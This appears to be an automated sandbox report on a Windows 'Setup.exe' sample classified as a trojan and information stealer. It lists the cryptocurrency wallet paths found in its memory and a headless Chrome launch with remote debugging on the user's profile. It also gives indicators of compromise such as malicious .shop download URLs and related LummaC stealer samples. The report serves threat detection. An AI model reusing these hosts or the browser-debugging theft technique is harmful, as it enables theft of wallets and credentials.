      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317A250 GetProcessHeap,RtlAllocateHeap,RtlReAllocateHeap,GetLastError,HeapFree,0_2_0317A250
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A803E SetUnhandledExceptionFilter,0_2_031A803E
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A7439 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_031A7439
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A7EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031A7EE1

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6592, type: MEMORYSTR
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_031DC305
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031D4210
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031DC22F
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_031DC129
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,0_2_031DC000
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoEx,0_2_031BEE33
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBD0D
      Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_031DBDA0
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBC27
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031DBC72
      Source: C:\Users\user\Desktop\Setup.exeCode function: EnumSystemLocalesW,0_2_031D3C8D
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A80F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_031A80F5
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031D4F52 GetTimeZoneInformation,0_2_031D4F52
      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Electrum\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\ElectronCash\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ","info.seco"],
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aming\Exodus
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ethereum
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000B96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ledger Live
      Source: Yara match File source: Process Memory Space: Setup.exe PID: 6592, type: MEMORYSTR

      Remote Access Functionality

      Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Data from Local System | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 41 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 4 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      Setup.exe | 5% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.binS | 0% | Avira URL Cloud | safe |
      https://ras2.shop | 0% | Avira URL Cloud | safe |
      http://anglebug.com/6755: | 0% | Avira URL Cloud | safe |
      https://ras2.shop/Up | 0% | Avira URL Cloud | safe |
      https://klipcatepiu0.shop/int_clp_ldr_sha.txtmp | 100% | Avira URL Cloud | malware |
      https://klipcatepiu0.shop/int_clp_ldr_sha.txt | 100% | Avira URL Cloud | malware |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      steamcommunity.com | 104.121.10.34 | true | false | | high
      plus.l.google.com | 142.250.181.78 | true | false | | high
      play.google.com | 172.217.19.206 | true | false | | high
      www.google.com | 172.217.21.36 | true | false | | high
      ras2.shop | 104.21.2.114 | true | true | | unknown
      apis.google.com | unknown | unknown | false | | high
      Name | Malicious | Antivirus Detection | Reputation
      https://steamcommunity.com/profiles/76561199680660089 | false | | high
      https://ras2.shop/Up | true | Avira URL Cloud: safe | unknown
                                                                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 00000002.00000002.3542362273.00006508002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887219651.0000650800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888049278.00006508010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887772313.00006508010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888463880.0000650800F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887848412.0000650800F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1887601115.0000650801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888485035.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888519543.0000650800F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888423202.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://dl.google.com/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkehgbnfchrome.exe, 00000002.00000002.3541370501.0000650800040000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.ecosia.org/newtab/chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://lv.queniujq.cnSetup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.youtube.com/Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://drive-daily-5.corp.google.com/chrome.exe, 00000002.00000002.3542662744.000065080030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.3548674885.0000650800EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000002.00000002.3544959461.0000650800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543332924.00006508004F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pchrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3078chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/7553chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/5375chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pachrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ogs.googchrome.exe, 00000002.00000002.3549428510.000065080101D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjchrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 00000002.00000003.1877568441.00006508001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000002.00000002.3548674885.0000650800EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amSetup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.google.com/recaptcha/Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://checkout.steampowered.com/Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/7556chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://chromewebstore.google.com/chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://drive-preprod.corp.google.com/chrome.exe, 00000002.00000002.3542662744.000065080030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://unisolated.invalid/achrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.google.com/tools/feedback/chrome/__submitechrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/6692chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546747717.0000650800C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.binSSetup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/3623chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/3625chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://anglebug.com/3624chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
IP               Domain              Country        ASN      ASN Name         Malicious
104.121.10.34    steamcommunity.com  United States  16625    AKAMAI-ASUS      false
239.255.255.250  unknown             Reserved       unknown  unknown          false
104.21.2.114     ras2.shop           United States  13335    CLOUDFLARENETUS  true
172.217.21.36    www.google.com      United States  15169    GOOGLEUS         false
142.250.181.78   plus.l.google.com   United States  15169    GOOGLEUS         false

IP
192.168.2.4
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581482
Start date and time: 2024-12-27 21:26:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal92.troj.spyw.evad.winEXE@30/25@8/7
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                                                                                              • Number of executed functions: 41
                                                                                                                                                                                                              • Number of non-executed functions: 221
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.19.227, 64.233.161.84, 172.217.19.238, 142.250.181.142, 142.250.181.99, 142.250.181.74, 172.217.19.202, 172.217.17.42, 142.250.181.138, 142.250.181.106, 216.58.208.234, 172.217.19.234, 172.217.17.74, 142.250.181.42, 20.189.173.22, 20.42.65.92, 172.217.17.35, 172.217.17.46, 52.182.143.212, 172.217.19.206, 52.168.117.173, 172.202.163.200, 20.190.177.146, 2.22.157.166, 13.107.246.63
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): clients1.google.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: Setup.exe
                                                                                                                                                                                                              No simulations
                                                                                                                                                                                                                                                    • 104.120.124.62
                                                                                                                                                                                                                                                    pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    RUUSfr6dVm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    9idglWFv95.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttp://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.80.92
                                                                                                                                                                                                                                                    https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.148.171
                                                                                                                                                                                                                                                    search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.153.170
                                                                                                                                                                                                                                                    http://bitstampweb.0532tg.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.133.12
                                                                                                                                                                                                                                                    https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.66.0.145
                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.152.152
                                                                                                                                                                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 104.21.89.250
                                                                                                                                                                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    TrdIE26br9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    EB2UOXRNsE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    gshv2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    DOTA2#U89c6#U8ddd#U63d2#U4ef6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
